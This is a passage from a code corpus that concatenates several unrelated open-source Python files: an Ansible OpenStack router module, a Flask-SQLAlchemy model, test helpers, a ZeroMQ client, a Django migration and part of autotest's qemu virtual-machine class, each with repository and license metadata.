# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
""",
]
|
chotchki/servo
|
python/licenseck.py
|
Python
|
mpl-2.0
| 1,985 | 0.002519 |
from . import db
from .assoc import section_professor
class Professor(db.Model):
__tablename__ = 'professors'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'), unique=True)
first_name = db.Column(db.Text, nullable=False)
last_name = db.Column(db.Text)
university_id = db.Column(db.Integer, db.ForeignKey('universities.id'), nullable=False)
university = db.relationship('University', back_populates='professors')
sections = db.relationship('Section', secondary=section_professor, back_populates='professors')
evaluations = db.relationship('Evaluation', back_populates='professor')
__mapper_args__ = {
'polymorphic_identity': 'p',
}
def to_dict(self):
return {
'id': self.id,
'first_name': self.first_name,
'last_name': self.last_name
}
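    # Illustrative result (assumed values, not from this project): for a row
    # with id=1, first_name='Ada', last_name='Lovelace', to_dict() returns
    #   {'id': 1, 'first_name': 'Ada', 'last_name': 'Lovelace'}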
|
SCUEvals/scuevals-api
|
scuevals_api/models/professor.py
|
Python
|
agpl-3.0
| 905 | 0.00221 |
#!/usr/bin/python
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
try:
import shade
HAS_SHADE = True
except ImportError:
HAS_SHADE = False
DOCUMENTATION = '''
---
module: os_router
short_description: Create or delete routers from OpenStack
extends_documentation_fragment: openstack
version_added: "2.0"
author: "David Shrewsbury (@Shrews)"
description:
- Create or Delete routers from OpenStack. Although Neutron allows
routers to share the same name, this module enforces name uniqueness
to be more user friendly.
options:
state:
description:
- Indicate desired state of the resource
choices: ['present', 'absent']
default: present
name:
description:
- Name to be give to the router
required: true
admin_state_up:
description:
- Desired admin state of the created or existing router.
required: false
default: true
enable_snat:
description:
- Enable Source NAT (SNAT) attribute.
required: false
default: true
network:
description:
- Unique name or ID of the external gateway network.
type: string
required: true when I(interfaces) or I(enable_snat) are provided,
false otherwise.
default: None
external_fixed_ips:
description:
- The IP address parameters for the external gateway network. Each
is a dictionary with the subnet name or ID (subnet) and the IP
address to assign on the subnet (ip). If no IP is specified,
one is automatically assigned from that subnet.
required: false
default: None
interfaces:
description:
- List of subnets to attach to the router internal interface.
required: false
default: None
requirements: ["shade"]
'''
EXAMPLES = '''
# Create a simple router, not attached to a gateway or subnets.
- os_router:
cloud: mycloud
state: present
name: simple_router
# Creates a router attached to ext_network1 on an IPv4 subnet and one
# internal subnet interface.
- os_router:
cloud: mycloud
state: present
name: router1
network: ext_network1
external_fixed_ips:
- subnet: public-subnet
ip: 172.24.4.2
interfaces:
- private-subnet
# Update existing router1 external gateway to include the IPv6 subnet.
# Note that since 'interfaces' is not provided, any existing internal
# interfaces on an existing router will be left intact.
- os_router:
cloud: mycloud
state: present
name: router1
network: ext_network1
external_fixed_ips:
- subnet: public-subnet
ip: 172.24.4.2
- subnet: ipv6-public-subnet
ip: 2001:db8::3
# Delete router1
- os_router:
cloud: mycloud
state: absent
name: router1
'''
RETURN = '''
router:
description: Dictionary describing the router.
returned: On success when I(state) is 'present'
type: dictionary
contains:
id:
description: Router ID.
type: string
sample: "474acfe5-be34-494c-b339-50f06aa143e4"
name:
description: Router name.
type: string
sample: "router1"
admin_state_up:
description: Administrative state of the router.
type: boolean
sample: true
status:
description: The router status.
type: string
sample: "ACTIVE"
tenant_id:
description: The tenant ID.
type: string
sample: "861174b82b43463c9edc5202aadc60ef"
external_gateway_info:
description: The external gateway parameters.
type: dictionary
sample: {
"enable_snat": true,
"external_fixed_ips": [
{
"ip_address": "10.6.6.99",
"subnet_id": "4272cb52-a456-4c20-8f3c-c26024ecfa81"
}
]
}
routes:
description: The extra routes configuration for L3 router.
type: list
'''
def _needs_update(cloud, module, router, network, internal_subnet_ids):
"""Decide if the given router needs an update.
"""
if router['admin_state_up'] != module.params['admin_state_up']:
return True
if router['external_gateway_info']:
if router['external_gateway_info'].get('enable_snat', True) != module.params['enable_snat']:
return True
if network:
if not router['external_gateway_info']:
return True
elif router['external_gateway_info']['network_id'] != network['id']:
return True
# check external interfaces
if module.params['external_fixed_ips']:
for new_iface in module.params['external_fixed_ips']:
subnet = cloud.get_subnet(new_iface['subnet'])
exists = False
# compare the requested interface with existing, looking for an existing match
for existing_iface in router['external_gateway_info']['external_fixed_ips']:
if existing_iface['subnet_id'] == subnet['id']:
if 'ip' in new_iface:
if existing_iface['ip_address'] == new_iface['ip']:
# both subnet id and ip address match
exists = True
break
else:
# only the subnet was given, so ip doesn't matter
exists = True
break
# this interface isn't present on the existing router
if not exists:
return True
# check internal interfaces
if module.params['interfaces']:
existing_subnet_ids = []
for port in cloud.list_router_interfaces(router, 'internal'):
if 'fixed_ips' in port:
for fixed_ip in port['fixed_ips']:
existing_subnet_ids.append(fixed_ip['subnet_id'])
if set(internal_subnet_ids) != set(existing_subnet_ids):
return True
return False
def _system_state_change(cloud, module, router, network, internal_ids):
"""Check if the system state would be changed."""
state = module.params['state']
if state == 'absent' and router:
return True
if state == 'present':
if not router:
return True
return _needs_update(cloud, module, router, network, internal_ids)
return False
def _build_kwargs(cloud, module, router, network):
kwargs = {
'admin_state_up': module.params['admin_state_up'],
}
if router:
kwargs['name_or_id'] = router['id']
else:
kwargs['name'] = module.params['name']
if network:
kwargs['ext_gateway_net_id'] = network['id']
# can't send enable_snat unless we have a network
kwargs['enable_snat'] = module.params['enable_snat']
if module.params['external_fixed_ips']:
kwargs['ext_fixed_ips'] = []
for iface in module.params['external_fixed_ips']:
subnet = cloud.get_subnet(iface['subnet'])
d = {'subnet_id': subnet['id']}
if 'ip' in iface:
d['ip_address'] = iface['ip']
kwargs['ext_fixed_ips'].append(d)
return kwargs
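# Illustrative sketch (the concrete values are assumptions, not produced by this
# module): for the "router1" entry in EXAMPLES above, _build_kwargs() on a new
# router would return roughly
#   {'admin_state_up': True, 'name': 'router1',
#    'ext_gateway_net_id': '<id of ext_network1>', 'enable_snat': True,
#    'ext_fixed_ips': [{'subnet_id': '<id of public-subnet>',
#                       'ip_address': '172.24.4.2'}]}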
def _validate_subnets(module, cloud):
external_subnet_ids = []
internal_subnet_ids = []
if module.params['external_fixed_ips']:
for iface in module.params['external_fixed_ips']:
subnet = cloud.get_subnet(iface['subnet'])
if not subnet:
module.fail_json(msg='subnet %s not found' % iface['subnet'])
external_subnet_ids.append(subnet['id'])
if module.params['interfaces']:
for iface in module.params['interfaces']:
subnet = cloud.get_subnet(iface)
if not subnet:
module.fail_json(msg='subnet %s not found' % iface)
internal_subnet_ids.append(subnet['id'])
return (external_subnet_ids, internal_subnet_ids)
def main():
argument_spec = openstack_full_argument_spec(
state=dict(default='present', choices=['absent', 'present']),
name=dict(required=True),
admin_state_up=dict(type='bool', default=True),
enable_snat=dict(type='bool', default=True),
network=dict(default=None),
interfaces=dict(type='list', default=None),
external_fixed_ips=dict(type='list', default=None),
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec,
supports_check_mode=True,
**module_kwargs)
if not HAS_SHADE:
module.fail_json(msg='shade is required for this module')
state = module.params['state']
name = module.params['name']
network = module.params['network']
if module.params['external_fixed_ips'] and not network:
module.fail_json(msg='network is required when supplying external_fixed_ips')
try:
cloud = shade.openstack_cloud(**module.params)
router = cloud.get_router(name)
net = None
if network:
net = cloud.get_network(network)
if not net:
module.fail_json(msg='network %s not found' % network)
# Validate and cache the subnet IDs so we can avoid duplicate checks
# and expensive API calls.
external_ids, internal_ids = _validate_subnets(module, cloud)
if module.check_mode:
module.exit_json(
changed=_system_state_change(cloud, module, router, net, internal_ids)
)
if state == 'present':
changed = False
if not router:
kwargs = _build_kwargs(cloud, module, router, net)
router = cloud.create_router(**kwargs)
for internal_subnet_id in internal_ids:
cloud.add_router_interface(router, subnet_id=internal_subnet_id)
changed = True
else:
if _needs_update(cloud, module, router, net, internal_ids):
kwargs = _build_kwargs(cloud, module, router, net)
router = cloud.update_router(**kwargs)
# On a router update, if any internal interfaces were supplied,
# just detach all existing internal interfaces and attach the new.
if internal_ids:
ports = cloud.list_router_interfaces(router, 'internal')
for port in ports:
cloud.remove_router_interface(router, port_id=port['id'])
for internal_subnet_id in internal_ids:
cloud.add_router_interface(router, subnet_id=internal_subnet_id)
changed = True
module.exit_json(changed=changed, router=router)
elif state == 'absent':
if not router:
module.exit_json(changed=False)
else:
# We need to detach all internal interfaces on a router before
# we will be allowed to delete it.
ports = cloud.list_router_interfaces(router, 'internal')
for port in ports:
cloud.remove_router_interface(router, port_id=port['id'])
cloud.delete_router(name)
module.exit_json(changed=True)
except shade.OpenStackCloudException as e:
module.fail_json(msg=e.message)
# this is magic, see lib/ansible/module_common.py
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == '__main__':
main()
|
tersmitten/ansible-modules-core
|
cloud/openstack/os_router.py
|
Python
|
gpl-3.0
| 12,382 | 0.001373 |
# -*- coding: utf-8 -*-
# Copyright 2010-2011 OpenStack Foundation
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Base TestCase for all cratonclient tests."""
import mock
import six
import sys
from oslotest import base
from cratonclient.shell import main
class TestCase(base.BaseTestCase):
"""Test case base class for all unit tests."""
class ShellTestCase(base.BaseTestCase):
"""Test case base class for all shell unit tests."""
def shell(self, arg_str, exitcodes=(0,)):
"""Main function for exercising the craton shell."""
with mock.patch('sys.stdout', new=six.StringIO()) as mock_stdout, \
mock.patch('sys.stderr', new=six.StringIO()) as mock_stderr:
try:
main_shell = main.CratonShell()
main_shell.main(arg_str.split())
except SystemExit:
exc_type, exc_value, exc_traceback = sys.exc_info()
self.assertIn(exc_value.code, exitcodes)
return (mock_stdout.getvalue(), mock_stderr.getvalue())
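    # Illustrative usage in a concrete test case (the '--help' invocation and
    # the expected output are assumptions for demonstration, not taken from
    # this file):
    #
    #   out, err = self.shell('--help', exitcodes=(0,))
    #   self.assertIn('usage', out.lower())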
|
opstooling/python-cratonclient
|
cratonclient/tests/base.py
|
Python
|
apache-2.0
| 1,608 | 0.000622 |
# -*- coding: utf-8 -*-
"""
Write a function is_prime that takes one argument: a number from 0 to 1000.
If the number is prime, the function returns True; otherwise it returns False.
"""
prime_1000 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997]
def is_prime(num):
    if not isinstance(num, int):
        raise TypeError("argument is not an integer")
if num <= 0 or num > 1000:
raise ValueError("argument value out of bounds")
    if num == 2:
        return True
    if num % 2 == 0:
        return False
mass = prime_1000
i1 = 0
i2 = len(mass) - 1
while i1 < i2:
if num == mass[i1] or num == mass[i2]:
return True
mid = i2 - int(round((i2 - i1) / 2))
if num < mass[mid]:
i2 = mid - 1
elif num > mass[mid]:
i1 = mid + 1
else:
return True
return False
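# Illustrative sanity checks (not part of the original script):
#   is_prime(2)   -> True    (smallest prime)
#   is_prime(222) -> False   (even and greater than 2)
#   is_prime(997) -> True    (largest prime <= 1000)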
# -----------------------------------------------------------------------------
if __name__ == "__main__":
print is_prime(222)
|
victorivanovspb/challenge-accepted
|
resp_simple/is_prime.py
|
Python
|
gpl-3.0
| 1,857 | 0.005675 |
"""
Clone server Model Six
"""
import random
import time
import zmq
from clone import Clone
SUBTREE = "/client/"
def main():
# Create and connect clone
clone = Clone()
clone.subtree = SUBTREE
clone.connect("tcp://localhost", 5556)
clone.connect("tcp://localhost", 5566)
try:
while True:
# Distribute as key-value message
key = "%d" % random.randint(1,10000)
value = "%d" % random.randint(1,1000000)
clone.set(key, value, random.randint(0,30))
time.sleep(1)
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
|
soscpd/bee
|
root/tests/zguide/examples/Python/clonecli6.py
|
Python
|
mit
| 638 | 0.007837 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('zeltlager_registration', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='jugendgruppe',
name='address',
),
migrations.DeleteModel(
name='Jugendgruppe',
),
migrations.RemoveField(
model_name='zeltlagerdurchgang',
name='address',
),
migrations.RemoveField(
model_name='zeltlagerdurchgang',
name='description',
),
]
|
jjbgf/eventbooking
|
zeltlager_registration/migrations/0002_auto_20150211_2011.py
|
Python
|
gpl-2.0
| 675 | 0 |
"""
Utility classes and functions to handle Virtual Machine creation using qemu.
:copyright: 2008-2009 Red Hat Inc.
"""
import time
import os
import logging
import fcntl
import re
import commands
from autotest.client.shared import error
from autotest.client import utils
import utils_misc
import virt_vm
import test_setup
import storage
import qemu_monitor
import aexpect
import qemu_virtio_port
import remote
import data_dir
import utils_net
import qemu_devices
class QemuSegFaultError(virt_vm.VMError):
def __init__(self, crash_message):
virt_vm.VMError.__init__(self, crash_message)
self.crash_message = crash_message
def __str__(self):
return ("Qemu crashed: %s" % self.crash_message)
class VMMigrateProtoUnsupportedError(virt_vm.VMMigrateProtoUnknownError):
"""
When QEMU tells us it doesn't know about a given migration protocol.
This usually happens when we're testing older QEMU. It makes sense to
skip the test in this situation.
"""
def __init__(self, protocol, output):
self.protocol = protocol
self.output = output
def __str__(self):
return ("QEMU reports it doesn't know migration protocol '%s'. "
"QEMU output: %s" % (self.protocol, self.output))
class KVMInternalError(virt_vm.VMError):
pass
class ImageUnbootableError(virt_vm.VMError):
def __init__(self, name):
virt_vm.VMError.__init__(self, name)
self.name = name
def __str__(self):
return ("VM '%s' can't bootup from image,"
" check your boot disk image file." % self.name)
class VM(virt_vm.BaseVM):
"""
This class handles all basic VM operations.
"""
MIGRATION_PROTOS = ['rdma', 'x-rdma', 'tcp', 'unix', 'exec', 'fd']
# By default we inherit all timeouts from the base VM class except...
CLOSE_SESSION_TIMEOUT = 30
# Because we've seen qemu taking longer than 5 seconds to initialize
# itself completely, including creating the monitor sockets files
# which are used on create(), this timeout is considerably larger
# than the one on the base vm class
CREATE_TIMEOUT = 20
def __init__(self, name, params, root_dir, address_cache, state=None):
"""
Initialize the object and set a few attributes.
:param name: The name of the object
:param params: A dict containing VM params
(see method make_qemu_command for a full description)
:param root_dir: Base directory for relative filenames
:param address_cache: A dict that maps MAC addresses to IP addresses
:param state: If provided, use this as self.__dict__
"""
if state:
self.__dict__ = state
else:
self.process = None
self.serial_console = None
self.redirs = {}
self.spice_options = {}
self.vnc_port = 5900
self.monitors = []
self.virtio_ports = [] # virtio_console / virtio_serialport
self.pci_assignable = None
self.uuid = None
self.vcpu_threads = []
self.vhost_threads = []
self.devices = None
self.name = name
self.params = params
self.root_dir = root_dir
self.address_cache = address_cache
self.index_in_use = {}
# This usb_dev_dict member stores usb controller and device info,
# It's dict, each key is an id of usb controller,
# and key's value is a list, contains usb devices' ids which
# attach to this controller.
# A filled usb_dev_dict may look like:
# { "usb1" : ["stg1", "stg2", "stg3", "stg4", "stg5", "stg6"],
# "usb2" : ["stg7", "stg8"],
# ...
# }
        # This structure can be used in usb hotplug/unplug tests.
self.usb_dev_dict = {}
self.logs = {}
self.logsessions = {}
self.driver_type = 'qemu'
self.params['driver_type_' + self.name] = self.driver_type
# virtnet init depends on vm_type/driver_type being set w/in params
super(VM, self).__init__(name, params)
# un-overwrite instance attribute, virtnet db lookups depend on this
if state:
self.instance = state['instance']
self.qemu_command = ''
self.start_time = 0.0
def verify_alive(self):
"""
Make sure the VM is alive and that the main monitor is responsive.
:raise VMDeadError: If the VM is dead
:raise: Various monitor exceptions if the monitor is unresponsive
"""
self.verify_disk_image_bootable()
self.verify_userspace_crash()
self.verify_kernel_crash()
self.verify_illegal_instruction()
self.verify_kvm_internal_error()
try:
virt_vm.BaseVM.verify_alive(self)
if self.monitor:
self.monitor.verify_responsive()
except virt_vm.VMDeadError:
raise virt_vm.VMDeadError(self.process.get_status(),
self.process.get_output())
def is_alive(self):
"""
Return True if the VM is alive and its monitor is responsive.
"""
return not self.is_dead() and (not self.monitor or
self.monitor.is_responsive())
def is_dead(self):
"""
Return True if the qemu process is dead.
"""
return not self.process or not self.process.is_alive()
def is_paused(self):
"""
Return True if the qemu process is paused ('stop'ed)
"""
if self.is_dead():
return False
try:
self.verify_status("paused")
return True
except virt_vm.VMStatusError:
return False
def verify_status(self, status):
"""
Check VM status
:param status: Optional VM status, 'running' or 'paused'
:raise VMStatusError: If the VM status is not same as parameter
"""
if not self.monitor.verify_status(status):
raise virt_vm.VMStatusError('Unexpected VM status: "%s"' %
self.monitor.get_status())
def verify_userspace_crash(self):
"""
Verify if the userspace component (qemu) crashed.
"""
if "(core dumped)" in self.process.get_output():
for line in self.process.get_output().splitlines():
if "(core dumped)" in line:
raise QemuSegFaultError(line)
def verify_kvm_internal_error(self):
"""
Verify KVM internal error.
"""
if "KVM internal error." in self.process.get_output():
out = self.process.get_output()
out = out[out.find("KVM internal error."):]
raise KVMInternalError(out)
def verify_disk_image_bootable(self):
if self.params.get("image_verify_bootable") == "yes":
pattern = self.params.get("image_unbootable_pattern")
if not pattern:
raise virt_vm.VMConfigMissingError(self.name,
"image_unbootable_pattern")
try:
seabios_log = self.logsessions['seabios'].get_output()
if re.search(pattern, seabios_log, re.S):
logging.error("Can't boot guest from image.")
# Set 'shutdown_command' to None to force autotest
# shuts down guest with monitor.
self.params["shutdown_command"] = None
raise ImageUnbootableError(self.name)
except KeyError:
pass
def clone(self, name=None, params=None, root_dir=None, address_cache=None,
copy_state=False):
"""
Return a clone of the VM object with optionally modified parameters.
The clone is initially not alive and needs to be started using create().
Any parameters not passed to this function are copied from the source
VM.
:param name: Optional new VM name
:param params: Optional new VM creation parameters
:param root_dir: Optional new base directory for relative filenames
:param address_cache: A dict that maps MAC addresses to IP addresses
:param copy_state: If True, copy the original VM's state to the clone.
Mainly useful for make_qemu_command().
"""
if name is None:
name = self.name
if params is None:
params = self.params.copy()
if root_dir is None:
root_dir = self.root_dir
if address_cache is None:
address_cache = self.address_cache
if copy_state:
state = self.__dict__.copy()
else:
state = None
return VM(name, params, root_dir, address_cache, state)
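    # Illustrative usage (assumed existing VM instance 'vm'): per the docstring
    # above, the clone starts out not alive and is started separately.
    #
    #   vm2 = vm.clone(name='vm2-clone')
    #   vm2.create()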
def get_serial_console_filename(self, name=None):
"""
Return the serial console filename.
:param name: The serial port name.
"""
if name:
return "/tmp/serial-%s-%s" % (name, self.instance)
return "/tmp/serial-%s" % self.instance
def get_serial_console_filenames(self):
"""
Return a list of all serial console filenames
(as specified in the VM's params).
"""
return [self.get_serial_console_filename(_) for _ in
self.params.objects("isa_serials")]
def make_create_command(self, name=None, params=None, root_dir=None):
"""
Generate a qemu command line. All parameters are optional. If a
parameter is not supplied, the corresponding value stored in the
class attributes is used.
:param name: The name of the object
:param params: A dict containing VM params
:param root_dir: Base directory for relative filenames
:note: The params dict should contain:
mem -- memory size in MBs
cdrom -- ISO filename to use with the qemu -cdrom parameter
extra_params -- a string to append to the qemu command
shell_port -- port of the remote shell daemon on the guest
(SSH, Telnet or the home-made Remote Shell Server)
shell_client -- client program to use for connecting to the
remote shell daemon on the guest (ssh, telnet or nc)
x11_display -- if specified, the DISPLAY environment variable
               will be set to this value for the qemu process (useful for
SDL rendering)
images -- a list of image object names, separated by spaces
nics -- a list of NIC object names, separated by spaces
For each image in images:
drive_format -- string to pass as 'if' parameter for this
image (e.g. ide, scsi)
image_snapshot -- if yes, pass 'snapshot=on' to qemu for
this image
image_boot -- if yes, pass 'boot=on' to qemu for this image
In addition, all parameters required by get_image_filename.
For each NIC in nics:
nic_model -- string to pass as 'model' parameter for this
NIC (e.g. e1000)
"""
# Helper function for command line option wrappers
def _add_option(option, value, option_type=None, first=False):
"""
Add option to qemu parameters.
"""
if first:
fmt = " %s=%s"
else:
fmt = ",%s=%s"
if option_type is bool:
# Decode value for bool parameter (supports True, False, None)
if value in ['yes', 'on', True]:
return fmt % (option, "on")
elif value in ['no', 'off', False]:
return fmt % (option, "off")
elif value and isinstance(value, bool):
return fmt % (option, "on")
elif value and isinstance(value, str):
# "EMPTY_STRING" and "NULL_STRING" is used for testing illegal
# foramt of option.
# "EMPTY_STRING": set option as a empty string "".
# "NO_EQUAL_STRING": set option as a option string only,
# even without "=".
# (In most case, qemu-kvm should recognize it as "<null>")
if value == "NO_EQUAL_STRING":
return ",%s" % option
if value == "EMPTY_STRING":
value = '""'
return fmt % (option, str(value))
return ""
# Wrappers for all supported qemu command line parameters.
# This is meant to allow support for multiple qemu versions.
# Each of these functions receives the output of 'qemu -help'
# as a parameter, and should add the requested command line
# option accordingly.
def add_name(devices, name):
return " -name '%s'" % name
def process_sandbox(devices, action):
if action == "add":
if devices.has_option("sandbox"):
return " -sandbox on "
elif action == "rem":
if devices.has_option("sandbox"):
return " -sandbox off "
def add_human_monitor(devices, monitor_name, filename):
if not devices.has_option("chardev"):
return " -monitor unix:'%s',server,nowait" % filename
monitor_id = "hmp_id_%s" % monitor_name
cmd = " -chardev socket"
cmd += _add_option("id", monitor_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -mon chardev=%s" % monitor_id
cmd += _add_option("mode", "readline")
return cmd
def add_qmp_monitor(devices, monitor_name, filename):
if not devices.has_option("qmp"):
logging.warn("Fallback to human monitor since qmp is"
" unsupported")
return add_human_monitor(devices, monitor_name, filename)
if not devices.has_option("chardev"):
return " -qmp unix:'%s',server,nowait" % filename
monitor_id = "qmp_id_%s" % monitor_name
cmd = " -chardev socket"
cmd += _add_option("id", monitor_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -mon chardev=%s" % monitor_id
cmd += _add_option("mode", "control")
return cmd
def add_serial(devices, name, filename):
if not devices.has_option("chardev"):
return " -serial unix:'%s',server,nowait" % filename
serial_id = "serial_id_%s" % name
cmd = " -chardev socket"
cmd += _add_option("id", serial_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -device isa-serial"
cmd += _add_option("chardev", serial_id)
return cmd
def add_virtio_port(devices, name, bus, filename, porttype, chardev,
name_prefix=None, index=None, extra_params=""):
"""
Appends virtio_serialport or virtio_console device to cmdline.
            :param devices: qemu devices container
:param name: Name of the port
:param bus: Which virtio-serial-pci device use
:param filename: Path to chardev filename
:param porttype: Type of the port (*serialport, console)
:param chardev: Which chardev to use (*socket, spicevmc)
:param name_prefix: Custom name prefix (port index is appended)
:param index: Index of the current virtio_port
            :param extra_params: Space separated chardev params
"""
cmd = ''
# host chardev
if chardev == "spicevmc": # SPICE
cmd += " -chardev spicevmc,id=dev%s,name=%s" % (name, name)
else: # SOCKET
cmd = (" -chardev socket,id=dev%s,path=%s,server,nowait"
% (name, filename))
# virtport device
if porttype in ("console", "virtio_console"):
cmd += " -device virtconsole"
else:
cmd += " -device virtserialport"
if name_prefix: # used by spiceagent (com.redhat.spice.*)
port_name = "%s%d" % (name_prefix, index)
else:
port_name = name
cmd += ",chardev=dev%s,name=%s,id=%s" % (name, port_name, name)
cmd += _add_option("bus", bus)
            # Space separated chardev params
_params = ""
for parm in extra_params.split():
_params += ',' + parm
cmd += _params
return cmd
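        # Illustrative result (argument values are assumptions): calling
        #   add_virtio_port(devices, 'vs1', 'virtio_serial_pci0.0',
        #                   '/tmp/virtio-vs1', 'serialport', 'socket')
        # yields roughly:
        #   -chardev socket,id=devvs1,path=/tmp/virtio-vs1,server,nowait
        #   -device virtserialport,chardev=devvs1,name=vs1,id=vs1,bus=virtio_serial_pci0.0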
def add_log_seabios(devices):
if not devices.has_device("isa-debugcon"):
return ""
default_id = "seabioslog_id_%s" % self.instance
filename = "/tmp/seabios-%s" % self.instance
self.logs["seabios"] = filename
cmd = " -chardev socket"
cmd += _add_option("id", default_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -device isa-debugcon"
cmd += _add_option("chardev", default_id)
cmd += _add_option("iobase", "0x402")
return cmd
def add_log_anaconda(devices):
chardev_id = "anacondalog_chardev_%s" % self.instance
vioser_id = "anacondalog_vioser_%s" % self.instance
filename = "/tmp/anaconda-%s" % self.instance
self.logs["anaconda"] = filename
dev = qemu_devices.QCustomDevice('chardev', backend='backend')
dev.set_param('backend', 'socket')
dev.set_param('id', chardev_id)
dev.set_param("path", filename)
dev.set_param("server", 'NO_EQUAL_STRING')
dev.set_param("nowait", 'NO_EQUAL_STRING')
devices.insert(dev)
dev = QDevice('virtio-serial-pci', parent_bus={'type': 'pci'})
dev.set_param("id", vioser_id)
devices.insert(dev)
dev = QDevice('virtserialport')
dev.set_param("bus", "%s.0" % vioser_id)
dev.set_param("chardev", chardev_id)
dev.set_param("name", "org.fedoraproject.anaconda.log.0")
devices.insert(dev)
def add_mem(devices, mem):
return " -m %s" % mem
def add_smp(devices):
smp_str = " -smp %d" % self.cpuinfo.smp
smp_pattern = "smp n\[,maxcpus=cpus\].*"
if devices.has_option(smp_pattern):
smp_str += ",maxcpus=%d" % self.cpuinfo.maxcpus
smp_str += ",cores=%d" % self.cpuinfo.cores
smp_str += ",threads=%d" % self.cpuinfo.threads
smp_str += ",sockets=%d" % self.cpuinfo.sockets
return smp_str
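        # Illustrative result (assumed cpuinfo values smp=4, maxcpus=4, cores=2,
        # threads=1, sockets=2, on a qemu that supports the maxcpus syntax):
        #   " -smp 4,maxcpus=4,cores=2,threads=1,sockets=2"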
def add_nic(devices, vlan, model=None, mac=None, device_id=None,
netdev_id=None, nic_extra_params=None, pci_addr=None,
bootindex=None, queues=1, vectors=None):
if model == 'none':
return
if devices.has_option("device"):
if not model:
model = "rtl8139"
elif model == "virtio":
model = "virtio-net-pci"
dev = QDevice(model)
dev.set_param('mac', mac)
# only pci domain=0,bus=0,function=0 is supported for now.
#
                # libvirt obtains the pci_slot / free pci address here by
                # parsing the xml file, i.e. counting all the pci devices
                # and storing the number.
if model != 'spapr-vlan':
dev.parent_bus = {'type': 'pci'}
dev.set_param('addr', pci_addr)
if nic_extra_params:
nic_extra_params = (_.split('=', 1) for _ in
nic_extra_params.split(',') if _)
for key, val in nic_extra_params:
dev.set_param(key, val)
dev.set_param("bootindex", bootindex)
else:
dev = qemu_devices.QCustomDevice('net', backend='type')
dev.set_param('type', 'nic')
dev.set_param('model', model)
dev.set_param('macaddr', mac, 'NEED_QUOTE')
dev.set_param('id', device_id, 'NEED_QUOTE')
if "virtio" in model:
if int(queues) > 1:
dev.set_param('mq', 'on')
if vectors:
dev.set_param('vectors', vectors)
if devices.has_option("netdev"):
dev.set_param('netdev', netdev_id)
else:
dev.set_param('vlan', vlan)
devices.insert(dev)
def add_net(devices, vlan, nettype, ifname=None, tftp=None,
bootfile=None, hostfwd=[], netdev_id=None,
netdev_extra_params=None, tapfds=None, script=None,
downscript=None, vhost=None, queues=None, vhostfds=None):
mode = None
if nettype in ['bridge', 'network', 'macvtap']:
mode = 'tap'
elif nettype == 'user':
mode = 'user'
else:
logging.warning("Unknown/unsupported nettype %s" % nettype)
return ''
if devices.has_option("netdev"):
cmd = " -netdev %s,id=%s" % (mode, netdev_id)
if vhost:
cmd += ",%s" % vhost
if vhostfds:
if (int(queues) > 1 and
'vhostfds=' in devices.get_help_text()):
cmd += ",vhostfds=%s" % vhostfds
else:
txt = ""
if int(queues) > 1:
txt = "qemu do not support vhost multiqueue,"
txt += " Fall back to single queue."
if 'vhostfd=' in devices.get_help_text():
cmd += ",vhostfd=%s" % vhostfds.split(":")[0]
else:
txt += " qemu do not support vhostfd."
if txt:
logging.warn(txt)
if netdev_extra_params:
cmd += "%s" % netdev_extra_params
else:
cmd = " -net %s,vlan=%d" % (mode, vlan)
if mode == "tap" and tapfds:
if (int(queues)) > 1 and ',fds=' in devices.get_help_text():
cmd += ",fds=%s" % tapfds
else:
cmd += ",fd=%s" % tapfds
elif mode == "user":
if tftp and "[,tftp=" in devices.get_help_text():
